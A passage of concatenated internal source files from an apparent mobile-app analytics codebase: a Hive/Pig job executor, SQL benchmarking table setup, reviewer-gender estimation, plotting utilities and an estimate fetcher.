if p.startswith('D')])
if not self.t:
job_conf_params += ' -hiveconf hadoop.job.history.user.location=none'
params = ' '.join([
'-hivevar %s=%s' % (p, v) for p, v in kwargs.iteritems()
if not p.startswith('D')
]).replace('"', '\\"')
if self.t or "running_locally" in kwargs:
status, output = commands.getstatusoutput(
'cd %s;hive %s %s %s -f %s -S' % (
hive_file_path, job_conf_params, mode_str, params,
running_file)
)
else:
master_ip = self.get_master_ip(kwargs)
if not master_ip:
commands.getstatusoutput('rm -rf %s' % running_file)
return -1, 'No master_ip found'
dest_file = running_file[running_file.find('aardvark-analyze'):]
dest_path = dest_file.rsplit('/', 1)[0]
status, output = commands.getstatusoutput(
'scp -rqC -i %s %s hadoop@%s:%s' % (
settings.EMR_KEY_PAIR_FILE, running_file, master_ip,
dest_path + '/'
)
)
status, output = commands.getstatusoutput(
'ssh -o StrictHostKeyChecking=no hadoop%s -i %s '
'--command "cd %s;~/hive/bin/hive %s %s %s -f %s -S"' % (
master_ip, settings.EMR_KEY_PAIR_FILE, dest_path,
mode_str, job_conf_params, params, '~/' + dest_file
)
)
for f in output_path_list:
if not f.startswith('s3n'):
continue
for p, v in kwargs.iteritems():
f = f.replace('$%s' % p, str(v))
self.del_s3_zero_file(f)
if status != 0:
self.alert_on_fail(script_name=hive_file_name + '.sql')
commands.getstatusoutput('rm -rf %s' % running_file)
class LoopExecutor(Executor):
"""
loop executor
"""
_result = list()
def _extract_loop_kwargs(self, kwargs):
def _parse_loop(loop_content):
if not isinstance(loop_content, dict):
raise Exception('Each loop circle should be a dict containing "arg", "generator", and "params".')
if 'arg' not in loop_content:
raise Exception('No arg in loop circle.')
if 'generator' not in loop_content:
raise Exception('No genarator in loop circle.')
if 'generator_params' not in loop_content:
raise Exception('No generator_params in loop circle.')
loop_arg = loop_content.get('arg')
generator_content = loop_content.get('generator').rsplit('.', 2)
if len(generator_content) == 1:
module = 'loop_generators'
generator = generator_content[0]
elif len(generator_content) == 2:
module, generator = generator_content
elif len(generator_content) == 3:
_path, module, generator = generator_content
sys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0],
'../../' + _path.replace('.', '/')))
else:
raise Exception(('Generator should be in format:[generator_path].[generator_module].[generator_class], '
'like workflow.module.loop_generators.TimeLoopGenerator.'))
loop_generator = getattr(import_module(module), generator)
try:
loop_generator = loop_generator(**loop_content.get('generator_params'))
except TypeError:
raise Exception('Necessary generator_params(s) for %s.__init__() are missing.' % generator)
_multiprocess_num = loop_content.get('multiprocess')
if _multiprocess_num:
try:
loop_multiprocess = int(_multiprocess_num)
if loop_multiprocess <= 1:
loop_multiprocess = 0
except ValueError:
loop_multiprocess = 0
else:
loop_multiprocess = 0
return (loop_arg, loop_generator, loop_multiprocess)
loop_kwargs = list()
_loop_content = kwargs.get('loop')
if isinstance(_loop_content, list):
for _each_loop in _loop_content:
loop_kwargs.append(_parse_loop(_each_loop))
elif isinstance(_loop_content, dict):
loop_kwargs.append(_parse_loop(_loop_content))
return loop_kwargs
def _execute(self, loop_list, loop_kwargs, args, raw_kwargs):
_loop_arg, _generator, _multiprocess = loop_list[0]
if len(loop_list) == 1:
_script_type = self._script_type.rsplit('.', 1)[1] # loop.pig / loop.hive
_executor = Executor.get_executor(_script_type)
_executor = _executor(self._script_file_path, self.t, self.alert_on_fail_flag)
if _multiprocess >= 2:
queue = copy.deepcopy(_generator)
pool = Pool(processes=_multiprocess)
for _loop_kwarg in queue:
kwargs = copy.deepcopy(loop_kwargs)
kwargs.update(_loop_kwarg)
kwargs.update(raw_kwargs)
pool.apply_async(_executor.run, args=args, kwds=kwargs, callback=self._collect_result)
pool.close()
pool.join()
else:
kwargs = copy.deepcopy(loop_kwargs)
for val in _generator.generate():
kwargs.update({_loop_arg: val})
kwargs.update(raw_kwargs)
self._collect_result(
_executor.run(*args, **kwargs), args, kwargs)
return
for val in _generator.generate(**loop_kwargs):
loop_kwargs.update({_loop_arg: val})
self._execute(loop_list[1:], loop_kwargs, args, raw_kwargs)
def _collect_result(self, result, args, kwargs):
status, output = result
if status != 0:
self._result.append('*' * 80)
self._result.append(
'Running error with args as "%s" and kwargs as "%s".'
% (str(args), str(kwargs)))
self._result.append(output)
def run(self, *args, **kwargs):
loop_kwargs = self._extract_loop_kwargs(kwargs)
if 'loop' in kwargs:
kwargs.pop('loop')
loop_multiprocess_kwargs = [kw for kw in loop_kwargs if kw[2] >= 2]
loop_all_kwargs = [kw for kw in loop_kwargs if kw[2] < 2 and kw[2] >= 0]
if loop_multiprocess_kwargs:
multiprocess_args = list()
for _arg in [arg.split(',') for arg, _, _ in loop_multiprocess_kwargs]:
multiprocess_args.extend(_arg)
multiprocess_num = reduce(lambda x, y: x * y, [num for _, _, num in loop_multiprocess_kwargs])
multiprocess_queue = list()
for item in itertools.product(*[generator.generate() for _, generator, _ in loop_multiprocess_kwargs]):
values = list()
for _val in item:
if isinstance(_val, tuple):
values.extend(_val)
else:
values.append(_val)
_kwargs = dict((key, val) for key, val in zip(multiprocess_args, values))
multiprocess_queue.append(_kwargs)
loop_all_kwargs.append((multiprocess_args, multiprocess_queue, multiprocess_num))
self._execute(loop_all_kwargs, {}, args, kwargs)
return (-1, '\n'.join(self._result)) if self._result else (0, 'Success')
<file_sep>/audience/legacy_experiments/get_app_gender_from_db_android.py
import nltk
import pandas as pd
import random
import re
import numpy as np
from unidecode import unidecode
import psycopg2
import numpy as np
import argparse
def main():
parser=argparse.ArgumentParser()
parser.add_argument('treshold', type=float,
help='max value to be considered male or female')
args=parser.parse_args()
conn1=psycopg2.connect('dbname=aa_reviews user=aa host=10.38.48.144 port=5432')
cur1=conn1.cursor()
conn2=psycopg2.connect('dbname=aa_reviews user=aa host=10.38.48.144 port=5432')
cur2=conn2.cursor()
while True:
app_class = raw_input('Enter app class or q to quit: ')
if app_class == 'q':
break
sql = 'select n.p_male as reviewer, r.p_male as text, t.p_male as title, aar.id \
from reviewer_p n, review_p r, title_p t, aa_review aar \
where r.id = t.id \
and aar.reviewer = n.reviewer \
and aar.id = r.id \
and aar.date>=%s \
and aar.date<=%s'
params = (app_class,)
#print cur1.mogrify(sql, params)
cur1.execute(sql, params)
app_id = cur1.fetchone()
app_id = app_id[0]
sql = 'select p_male \
from review r, reviewer_gender g \
where r.reviewer=g.reviewer \
and r.language=g.language \
and g.p_male>=0 \
and r.app_id=%s \
and r.language=%s'
params = (app_id, 'en',)
#print cur2.mogrify(sql, params)
cur2.execute(sql, params)
p_male = cur2.fetchall()
p_male = [item for sublist in p_male for item in sublist]
p_male = np.array(p_male, dtype=np.dtype(float))
print 'Before Treshold count=%s, mean=%s'%(len(p_male), np.mean(p_male))
p_male = p_male[(p_male<args.treshold) | (p_male>(1.0-args.treshold))]
#print p_male
print 'After Treshold count=%s, mean=%s'%(len(p_male), np.mean(p_male))
p_male = np.around(p_male)
#print p_male
print 'mean=%s'%np.mean(p_male)
cur1.close()
conn1.close()
cur2.close()
conn2.close()
if __name__ == '__main__':
main()
<file_sep>/google-analytics/rincon_dump/compare_predict.sh
#! /bin/bash
if [ $# -eq 2 ]
then
file1=$1
file2=$2
echo "Comparing two files:"
echo $file1, $file2
else
echo 'Check the two files names for comparison'
exit 1
fi
cat $file1 | sort -t ',' -k 1,4 > sorted_1
cat $file2 | sort -t ',' -k 1,4 > sorted_2
vimdiff sorted_1 sorted_2
rm sorted_1 sorted_2
<file_sep>/evaluation/py/fetch_raw_est.py
"""
Fetch raw estimation through the script.
Arguments:
-p The platform configure to use.
"""
## Author: <NAME> <<EMAIL>>
from internal.args import parse_options
from internal.est_fetcher import *
def main():
opts, args = parse_options()
# Get the options.
stores = opts.stores
units_types = opts.units_types
daterange = opts.daterange
save_dir = args[0]
type = opts.type
fetcher = eval('%sEstFetcher' % _map_platform_to_class_name(opts.platform))
fetcher.fetch_to_dir(save_dir, stores, units_types, daterange, type)
def _map_platform_to_class_name(platform):
"""E.g. android_weekly -> AndroidWeekly
"""
return ''.join(map(str.capitalize, platform.split('_')))
if __name__ == '__main__':
main()
<file_sep>/int-vs-m-benchmark/create_table_statements_android.sql
/*
Create table statements for android specific tables:
- est_app_rank
- est_ranking
- sbe_est_app_unique
- sbe_est_app
*/
use aa_benchmarking_android;
DROP TABLE IF EXISTS est_app_rank;
DROP TABLE IF EXISTS est_ranking;
DROP TABLE IF EXISTS sbe_est_app_unique;
DROP TABLE IF EXISTS sbe_est_app;
CREATE TABLE est_app_rank (
app_id integer NOT NULL,
store_id integer NOT NULL,
category_id smallint NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
free smallint NOT NULL,
paid smallint NOT NULL,
revenue smallint NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
category_id,
app_id)
);
CREATE TABLE est_ranking (
store_id integer NOT NULL,
category_id smallint NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
rank smallint NOT NULL,
free integer NOT NULL,
paid integer NOT NULL,
revenue integer NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
category_id,
rank)
);
CREATE TABLE sbe_est_app_unique (
app_id integer NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
store_id integer NOT NULL,
free integer NOT NULL,
paid integer NOT NULL,
revenue integer NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
app_id)
);
CREATE TABLE sbe_est_app (
app_id integer NOT NULL,
store_id integer NOT NULL,
category_id smallint NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
free integer NOT NULL,
paid integer NOT NULL,
revenue integer NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
category_id,
app_id)
);
<file_sep>/int-vs-m-benchmark/sql/android/1001a5-initialize-settings_tables.sql
/*
DESCRIPTION : create working tables
INPUT TABLE(S) : market.countries,
market.applications,
market.currencies,
generic.exchange_rates,
generic.currencies,
market.appstore_instances,
market.rankcategories,
market.categories
INTERIM TABLE(S) : temp.countries_free_temp,
temp.countries_paid_temp,
temp.countries_gross_temp,
temp.day_weights_temp
OUTPUT TABLE(S) : temp.settings_countries
temp.settings_day_weights
temp.settings_excluded_apps
temp.settings_exchange_rates
temp.settings_appstore_instances
temp.settings_rankcategories
QUERY STEPS : 1. create temporary tables for countries, day weights, excluded apps, exchange rates,
appstore_instances, rankcategories
*/
-- The estimation date is the used for which the estimates are made. In
-- contrast to Apple Appstore, there is a gap of 1 day between the rankings
-- date and the last download date. This date is also used in the
-- *.new_estimation_market table.
SET @estimation_date = DATE_SUB(@date, INTERVAL 2 DAY);
-- COUNTRIES FREE --
SET @countries_free = REPLACE(TRIM(REPLACE(REPLACE(UPPER(@countries_free),' ',''),',',' ')),' ',',');
CALL generic_string_list_to_table_$process_id(@countries_free,'temp.countries_free_temp','VARCHAR(6)');
-- COUNTRIES PAID --
SET @countries_paid = REPLACE(TRIM(REPLACE(REPLACE(UPPER(@countries_paid),' ',''),',',' ')),' ',',');
CALL generic_string_list_to_table_$process_id(@countries_paid,'temp.countries_paid_temp','VARCHAR(6)');
-- COUNTRIES GROSS --
SET @countries_gross = REPLACE(TRIM(REPLACE(REPLACE(UPPER(@countries_gross),' ',''),',',' ')),' ',',');
CALL generic_string_list_to_table_$process_id(@countries_gross,'temp.countries_gross_temp','VARCHAR(6)');
-- GENERAL COUNTRIES SETTINGS TABLE --
DROP TEMPORARY TABLE IF EXISTS temp.settings_countries;
CREATE TEMPORARY TABLE temp.settings_countries (
iso_code VARCHAR(2),
type ENUM('gross','paid','free') NOT NULL,
CONSTRAINT PRIMARY KEY (iso_code,type)
)
AS
SELECT 'free' AS type, f.element as iso_code FROM temp.countries_free_temp f
UNION
SELECT 'paid' AS type, p.element as iso_code FROM temp.countries_paid_temp p
UNION
SELECT 'gross' AS type, g.element as iso_code FROM temp.countries_gross_temp g
;
-- DOWNLOAD DAY WEIGHTS --
SET @day_weights = REPLACE(TRIM(REPLACE(REPLACE(@day_weights,' ',''),',',' ')),' ',',');
CALL generic_string_list_to_table_$process_id(@day_weights,'temp.day_weights_temp','DECIMAL(4,3)');
-- Note that the first day weighted is the day before the run date (@date) and
-- not the estimation date.
DROP TEMPORARY TABLE IF EXISTS temp.settings_day_weights;
CREATE TEMPORARY TABLE temp.settings_day_weights(
date date,
weight DECIMAL(4,3),
CONSTRAINT PRIMARY KEY (date)
) AS
SELECT
DATE(DATE_SUB(@date,INTERVAL id - 1 day)) as date,
element as weight
FROM
temp.day_weights_temp
WHERE
element > 0
;
-- EXCLUDED_APPLICATIONS --
-- DO MINIMAL WORK TO REMOVE THIS FOR "FAIR BENCHMARKING", MAKING IT EASY TO INTRODUCE THEM AGAIN IF NEEDED
SET @exclude_application_ids = REPLACE(TRIM(REPLACE(REPLACE(@exclude_application_ids,' ',''),',',' ')),' ',',');
CALL generic_string_list_to_table_$process_id(@exclude_application_ids,'temp.excluded_applications_temp','INT');
DROP TEMPORARY TABLE IF EXISTS temp.settings_excluded_apps;
CREATE TEMPORARY TABLE temp.settings_excluded_apps
(application_id INT unsigned NOT NULL PRIMARY KEY)
AS
SELECT a.id AS application_id
FROM market.applications a
JOIN temp.excluded_applications_temp t ON (t.element = a.id OR t.element = a.parent_id)
;
-- EXCLUDED_PREINSTALLED_APPLICATIONS --
SET @exclude_preinstalled_application_ids = REPLACE(TRIM(REPLACE(REPLACE(@exclude_preinstalled_application_ids,' ',''),',',' ')),' ',',');
CALL generic_string_list_to_table_$process_id(@exclude_preinstalled_application_ids,
'temp.excluded_preinstalls_temp','INT');
DROP TEMPORARY TABLE IF EXISTS temp.settings_excluded_preinstalled_apps;
CREATE TEMPORARY TABLE temp.settings_excluded_preinstalled_apps
(application_id INT unsigned NOT NULL PRIMARY KEY)
AS
SELECT
a.id AS application_id
FROM
market.applications a
JOIN temp.excluded_preinstalls_temp t
ON t.element = a.id
;
-- EXCHANGE RATES --
DROP TEMPORARY TABLE IF EXISTS temp.settings_exchange_rates;
CREATE TEMPORARY TABLE temp.settings_exchange_rates (
id smallint(11) unsigned,
rate decimal(12,6),
CONSTRAINT PRIMARY KEY (id)
) AS
SELECT
cr.id,
gc_foreign.code,
er.rate
FROM generic.exchange_rates er
JOIN generic.currencies gc_base ON gc_base.id = er.currency_id
JOIN generic.currencies gc_foreign ON gc_foreign.id = er.foreign_currency_id
JOIN market.currencies cr ON cr.code = gc_foreign.code
WHERE er.date = @estimation_date
AND gc_base.code = 'USD'
;
-- APPSTORE INSTANCES --
DROP TEMPORARY TABLE IF EXISTS temp.settings_appstore_instances;
CREATE TEMPORARY TABLE temp.settings_appstore_instances(
appstore_instance_id SMALLINT(5) UNSIGNED NOT NULL,
type ENUM('gross','paid','free') NOT NULL,
country_id smallint(5) unsigned NOT NULL,
CONSTRAINT PRIMARY KEY (appstore_instance_id,type)
)
AS
SELECT
ai.id AS appstore_instance_id,
ai.country_id,
t.type
FROM market.appstore_instances ai
JOIN market.countries cn ON cn.id = ai.country_id
JOIN temp.settings_countries t ON t.iso_code = cn.iso_code
WHERE ai.device_id IS NULL
;
-- maybe a selection of categories?
-- there are many obsolete
-- RANKCATEGORIES RANKINGS --
DROP TEMPORARY TABLE IF EXISTS temp.settings_rankcategories;
CREATE TEMPORARY TABLE temp.settings_rankcategories(
`rankcategory_id` SMALLINT(5) UNSIGNED NOT NULL,
type ENUM('paid','gross','free') NOT NULL,
`category_id` SMALLINT(5) UNSIGNED NOT NULL,
CONSTRAINT PRIMARY KEY (
rankcategory_id,
type)
)
AS
SELECT
rc.id AS rankcategory_id,
rc.type,
rc.category_id
FROM market.rankcategories rc
JOIN market.categories c ON c.id = rc.category_id
WHERE rc.type IN ('free','paid','gross');
-- LOW QUALITY COUNTRIES --
SET @low_quality_countries = REPLACE(TRIM(REPLACE(REPLACE(UPPER(@low_quality_countries),' ',''),',',' ')),' ',',');
CALL generic_string_list_to_table_$process_id(@low_quality_countries,'temp.low_quality_countries_temp','VARCHAR(6)');
DROP TEMPORARY TABLE IF EXISTS temp.settings_low_quality_countries;
CREATE TEMPORARY TABLE temp.settings_low_quality_countries (
iso_code VARCHAR(2),
country_id smallint(5) unsigned NOT NULL,
CONSTRAINT PRIMARY KEY (iso_code))
AS
SELECT
iso_code,cn.id as country_id
FROM
market.countries cn
JOIN temp.low_quality_countries_temp t
ON t.element = cn.iso_code
;
<file_sep>/int-vs-m-benchmark/sql/ios/1000d2-prepare_application_data-extract_data_from_rankings.sql
/*
FUNCTIONAL DESCRIPTION : See if the price of an app changed, see if apps are only ranked for iPhone/IPad or for both
DEPENDS ON TABLE(S) : temp.rankings_hourly, temp.rankings_daily, appstore.categories
RESULTS IN TABLE(S) : temp.ranking_application_data
PROCEDURE : STEP 1. Gather rank information per device/category( Only Top Overall and All Games since we inly have hourly ranks for those categories)/country + pricing information from hourly ranks
Select the lowest rank per devices as a lower bound for the criteria to include those apps as 'universal apps'
STEP 2. Check again if price has changed, this time without distinction in categories
STEP 3. See if apps are ranked in iphone and ipad rankings as prepwork for universal fix
*/
-- STEP 1.
-- COMBINED RANKING DATA --
DROP TEMPORARY TABLE IF EXISTS temp.ranking_application_data_combined;
CREATE TEMPORARY TABLE temp.ranking_application_data_combined(
date date NOT NULL,
country_id smallint(5) unsigned NOT NULL,
`type` ENUM('free','paid','gross') NOT NULL,
application_id int(10) unsigned NOT NULL,
ranked_on_iphone smallint(5) DEFAULT NULL,
ranked_on_ipad smallint(5) DEFAULT NULL,
price_usd decimal(9,2) DEFAULT NULL,
price_changed TINYINT NOT NULL,
CONSTRAINT PRIMARY KEY (date, country_id, application_id, type)
)
SELECT
rd.date,
rd.country_id,
CAST(rd.type as CHAR(5)) as type,
rd.application_id,
MAX(IF(rd.device_id=1,1,0)) as ranked_on_iphone,
MAX(IF(rd.device_id=2,1,0)) as ranked_on_ipad,
MAX(rd.price_usd) as max_price_usd,
MIN(rd.price_usd) as min_price_usd,
AVG(rd.price_usd) AS avg_price_usd,
IF(MAX(rd.price_usd)<>MIN(rd.price_usd),1,0) AS price_changed
FROM
temp.rankings rd
GROUP BY
rd.date, rd.country_id, rd.type, rd.application_id
;
-- STEP 2.
-- FINAL CROSS type PRICE CHANGE CHECK --
DROP TEMPORARY TABLE IF EXISTS temp.price_changes;
CREATE TEMPORARY TABLE temp.price_changes
(CONSTRAINT PRIMARY KEY (date, country_id, application_id))
AS
SELECT date, country_id, application_id,
IF(MAX(price_changed )= 1,
1,
IF(MIN(price_usd) <> MAX(price_usd),
1,
0)
) AS price_changed
FROM
temp.ranking_application_data_combined
GROUP BY
date,
country_id,
application_id
;
-- STEP 3.
-- FINAL UNIVERSAL CHECK --
DROP TEMPORARY TABLE IF EXISTS temp.ranking_application_data;
CREATE TEMPORARY TABLE temp.ranking_application_data(
date date NOT NULL,
device_id TINYINT not null,
country_id smallint(5) unsigned NOT NULL,
`type` ENUM('free','paid','gross') NOT NULL,
application_id int(10) unsigned NOT NULL,
ranked_on_iphone TINYINT NOT NULL,
ranked_on_ipad TINYINT NOT NULL,
price_usd decimal(9,2) DEFAULT NULL,
price_changed TINYINT NOT NULL,
CONSTRAINT PRIMARY KEY (date,device_id,country_id, type, application_id)
)
SELECT
r.date,
d.device_id,
r.country_id,
r.type,
r.application_id,
r.ranked_on_iphone,
r.ranked_on_ipad,
r.price_usd,
p.price_changed
FROM temp.ranking_application_data_combined r
JOIN temp.price_changes p ON p.date = r.date AND p.country_id = r.country_id AND p.application_id = r.application_id
JOIN (SELECT 1 as 'device_id' UNION SELECT 2 as 'device_id') as d
HAVING (device_id = 1 AND ranked_on_iphone = 1) OR (device_id = 2 AND ranked_on_ipad = 1)
;
<file_sep>/aa_au_model/audience/audience/plot.py
import os
import pandas as pd
from collections import OrderedDict
from matplotlib import pyplot as plt
from sklearn import metrics
from sklearn import preprocessing
def diff_traces(df, time_var, id_var, value_vars, n_traces=500, metric='pp', **kwargs):
"""
Plot traces for differences in estimates over time.
:param df: DataFrame with: date column, ID column, and one or multiple value columns
:param time_var: Column name containing time index
:param id_var: Column name that is used as ID
:param value_vars: Iterable with column name(s) of variable(s) to plot.
Every variable is given a separate subplot.
:param n_traces: # traces to plot
:param metric: Metric that is plotted.
:param **kwargs: Keyword arguments for plt.subplots()
Example:
- plot_diff_traces(device_estimates, 'date', 'device_id',
['13-24', '25-54', 55+], 10)
- plot_diff_traces(app_estimates, 'date', 'bundle_id',
['13-24', '25-54', 55+], 50, figsize=(10, 3))
"""
max_std = -1
fig, ax = plt.subplots(len(value_vars), 1, **kwargs)
for ii, current_ax in enumerate(ax):
current_var = value_vars[ii]
# Pivot to get a matrix with time x id.
time_values = pd.pivot_table(df.reset_index(), values=current_var,
index=time_var, columns=id_var)
# Compute difference over time.
time_differences = time_values.diff().iloc[1:]
n_plot_traces = min(n_traces, time_values.shape[1])
# Plot sample of traces.
sampled_traces = time_differences.sample(n=n_plot_traces, axis=1)
sampled_traces.plot(style='-k', alpha=0.05, legend='', ax=current_ax)
# Population average with error bars.
pop = pd.concat([time_differences.mean(axis=1),
time_differences.std(axis=1)],
axis=1)
pop.columns = ['Average population diff', 'se']
pop.plot(y='Average population diff', yerr='se', ax=current_ax,
style='-o')
# Axes title with summary stats.
title_str = ("$ \Delta P ({}) $, overall WoW change: " +
"({:1.1f} $ \pm $ {:1.1f}) {} \t (# traces: {})")
diff_values = time_differences.values.flatten()
valid_diff = diff_values[pd.notnull(diff_values)]
title_stats = [current_var, valid_diff.mean(), valid_diff.std(),
metric, n_plot_traces]
# Format plot.
current_ax.set_title(title_str.format(*title_stats))
current_ax.set_ylabel('WoW change ({})'.format(metric))
lines, labels = current_ax.get_legend_handles_labels()
current_ax.legend([lines[-1][0]], [labels[-1]], loc='upper right')
max_std = max(max_std, valid_diff.std())
if ii != len(ax) - 1:
current_ax.set_xlabel('')
else:
current_ax.set_ylim((-max_std * 4, max_std * 4))
return fig, ax
def multiclass_roc_curve(df_true, df_score):
"""
Plot multiclass ROC curve. Plots per-class and micro ROC curves.
:param df_true: pd.DataFrame or pd.Series with the true labels
(labels should be the same as the column names of df_score)
:param df_score: pd.DataFrame with scores
:return: matplotlib.pyplot.figure
Example:
$ df_true = pd.Series(['male', 'male', 'female', 'other', 'other'])
$ df_score = pd.DataFrame({
'male': [0.8, 0.7, 0.1, 0.2, 0.8],
'female': [0.1, 0.1, 0.7, 0.2, 0.1],
'other': [0.1, 0.2, 0.2, 0.6, 0.1],
})
$ fig = multiclass_roc_curve(df_true, df_score)
"""
classes = df_score.columns
fig = plt.figure(figsize=(7, 6))
ax = fig.gca()
roc_auc = OrderedDict()
for current_bin in classes:
fpr, tpr, _ = metrics.roc_curve(df_true == current_bin,
df_score[current_bin])
roc_auc[current_bin] = metrics.roc_auc_score(df_true == current_bin,
df_score[current_bin])
ax.plot(fpr, tpr, '--')
label_binarizer = preprocessing.LabelBinarizer()
label_binarizer.fit(classes)
all_labels = label_binarizer.transform(df_true).ravel()
if len(classes) > 2:
all_probas = df_score.values.ravel()
macro_roc = metrics.roc_auc_score(label_binarizer.transform(df_true), df_score)
else:
all_probas = df_score.iloc[:, 1].values
macro_roc = metrics.roc_auc_score(all_labels, all_probas)
micro_fpr, micro_tpr, _ = metrics.roc_curve(all_labels, all_probas)
ax.plot(micro_fpr, micro_tpr, 'k')
roc_auc['all (micro)'] = metrics.roc_auc_score(all_labels, all_probas)
ax.plot([0, 1], [0, 1], ':k')
# Format plot
legend = [k + ' ROC: ' + '{:1.2f}'.format(v) for
k, v in roc_auc.iteritems()] + ['Random']
ax.legend(legend, loc='lower right')
ax.axis('equal')
ax.set_xlim([-0.0, 1.01])
ax.set_ylim([-0.0, 1.01])
ax.set_xlabel('False Positive Rate (fall-out)')
ax.set_ylabel('True Positive Rate (sensitivity)')
ax.set_title(', '.join(classes) + '; macro ROC AUC = {:1.2f}'.format(macro_roc))
fig.tight_layout()
return fig
def save_figure(fig, title, fig_folder='fig/'):
"""
Save figure as png.
:param fig: matplotlib.pyplot.figure object
:param title: Title of plot (converted to name)
:param fig_folder: Folder to output to
:return None
"""
file_name = title.replace(' ', '_').lower() + '.png'
fig_path = os.sep.join((fig_folder, file_name))
fig.savefig(fig_path)
print('Saved to: ' + fig_path)
<file_sep>/product_quality/internal/est_fetcher.py
"""
Fetcher for estimation.
"""
# Author: <NAME> <<EMAIL>>
import sys
import subprocess
import itertools
from joblib import Parallel, delayed
import pandas as pd
import os.path
import utilities_date
import utilities_pandas
import stores_dict
def _run_fetch_script(script_path, store, feed, dt):
cmd = "python %s -s %s -f %s -d %s" % (script_path, store, feed, dt)
print(cmd)
try:
print("Running the cmd: %s" % cmd)
child = subprocess.Popen(cmd.split(" "), stdout=subprocess.PIPE)
stdout_value, stderr_value = child.communicate()
ret = child.returncode
if ret is None or ret >= 2 or (stderr_value is not None and 'Error' in stderr_value):
raise Exception("Have problem fetching daily estimation: %s" % cmd)
df = utilities_pandas.convert_str_to_df(stdout_value)
return utilities_pandas.add_date_column(df, dt)
except Exception as e:
print(e)
sys.exit(2)
class ScriptEstFetcher(object):
"""Base class for all script based est fetcher.
"""
@classmethod
def fetch_to_dir(cls, save_dir, stores, units_types, daterange):
"""
Arguments:
- `save_dir`: the dir to save the results.
- `stores`: A list of stores to fetch.
- `units_types`: A list of unit_types to fetch.
- `daterange`: A 2-element list containing the start and the end date (inclusive).
"""
dtstart, dtend = daterange
feeds = itertools.chain(*[cls.unit_to_feeds[u] for u in units_types])
dts_daily = utilities_date.make_daily_daterange(dtstart, dtend)
for (store, feed) in itertools.product(stores, feeds):
dfs = Parallel(n_jobs=8)(delayed(_run_fetch_script)(cls.script_path, store, feed, dt)
for dt in dts_daily)
df = pd.concat(dfs)
csv_filename = os.path.join(save_dir, "%s_%s_%s--%s.csv" % (store, feed,
dts_daily[0],
dts_daily[-1]))
df = ScriptEstFetcher._add_meta_info(df, feed)
df.to_csv(csv_filename, index=False)
@staticmethod
def _add_meta_info(df, feed):
df['feed_id'] = feed
return df
class IosEstFetcher(ScriptEstFetcher):
"""Sorry for the sad name "Ios", but it's better to normalize things.
"""
unit_to_feeds = stores_dict.ios['unit_to_feeds']
script_path = 'external/est_ios.py'
class AndroidEstFetcher(ScriptEstFetcher):
unit_to_feeds = stores_dict.android['unit_to_feeds']
script_path = 'external/est_android.py'
<file_sep>/old_investigations/internal/plot_common.R
library(ggplot2)
library(scales)
read_csv_and_metainfo_from_arg <- function() {
system('mkdir plots')
args <- commandArgs(TRUE)
file = args[1]
one_split <- strsplit(file, "\\.")[[1]][1]
final_split <- strsplit(one_split, "_")[[1]]
country <- final_split[2]
period <- final_split[3]
df = read.csv(file)
metainfo = list(country=country, period=period)
r = list(df=df, metainfo=metainfo)
}
plot_dist <- function(stacked_df, metainfo) {
plot <- ggplot(stacked_df, aes(x=units_avg)) +
facet_grid(Unit ~ ., scales="free") +
geom_density(aes(colour=winner), alpha=0.3) +
ggtitle(paste(metainfo$country, metainfo$period)) +
xlab("Real Value")
}
plot_80_20 <- function(stacked_df, metainfo) {
plot <- ggplot(data=stacked_df, aes(x=differences, y=apps_percent)) +
facet_grid(unit ~ .) +
geom_line(aes(colour=estimation, size=size, legend=FALSE)) +
scale_x_continuous(labels=percent, breaks=seq(0, 1, 0.1)) +
scale_y_continuous(labels=percent) +
scale_size(range=c(0.4, 1)) +
guides(size=FALSE) +
geom_text(aes(0.8, 0.1, label=paste("Apps num:", apps_num))) +
xlab("Relative Error") + ylab("% of top Apps") +
ggtitle(paste(metainfo$country, metainfo$period)) +
theme(panel.grid.major = element_line(size = 0.5, colour = '#1391FF'),
panel.grid.minor = element_blank())
}
plot_improvement <- function(df, metainfo, objestimate) {
## x - objestimate relerror; y - sdaimprovement
p1 <- plot_y_sda_improvement_x_objestimate_relerror(df, objestimate)
## x - objestimate improvement; y - sdarelerror
p2 <- plot_y_objestimate_improvement_x_sda_relerror(df, objestimate)
## x - real values; y - sdaimprovement
p3 <- plot_y_sda_improvement_x_realvalues(df)
## x - relative error threhold; y - percentage of SDA improvement
p4 <- plot_y_sda_improvement_percent_x_relerror_diff_threhold(df, objestimate)
multiplot(p1, p2, p3, p4)
}
plot_y_sda_improvement_x_objestimate_relerror <- function(df, objestimate) {
point_size <- 3
alpha_value <- 0.1
hline <- geom_hline(aes(yintercept=0), linetype="dashed")
all_opts <- opts(axis.text.x=theme_text(size=20),
axis.text.y=theme_text(size=20),
axis.title.x=theme_text(size=20),
axis.title.y=theme_text(size=20),
legend.title=theme_text(size=20),
plot.title=theme_text(size=32),
strip.text.x = element_text(size = 25))
if (objestimate == 'CBE') {
xval = "CBE.Relative.Error"
} else if (objestimate == 'Overall') {
xval = "Overall.Relative.Error"
} else if (objestimate == 'Games') {
xval = "Games.Relative.Error"
}
ggplot(data=df, aes_string(x=xval, y='SDA.Improvement')) +
facet_grid(. ~ Unit) + geom_point(alpha=alpha_value, size=point_size) +
ggtitle(paste(metainfo$country, metainfo$period, "\n", paste("SDA Improvement (relative error) for", objestimate))) +
hline + all_opts
## Add this if you want to zoom in ----> coord_cartesian(xlim=c(0, 1), ylim=c(-2, 2))
}
plot_y_objestimate_improvement_x_sda_relerror <- function(df, objestimate) {
point_size <- 3
alpha_value <- 0.1
hline <- geom_hline(aes(yintercept=0), linetype="dashed")
all_opts <- opts(axis.text.x=theme_text(size=20),
axis.text.y=theme_text(size=20),
axis.title.x=theme_text(size=20),
axis.title.y=theme_text(size=20),
legend.title=theme_text(size=20),
plot.title=theme_text(size=32),
strip.text.x = element_text(size = 25))
ggplot(data=df, aes(x=SDA.Relative.Error, y=-SDA.Improvement)) +
facet_grid(. ~ Unit) + geom_point(alpha=alpha_value, size=point_size) + ggtitle(paste(objestimate, "Improvement (relative error) for SDA.")) + hline + all_opts
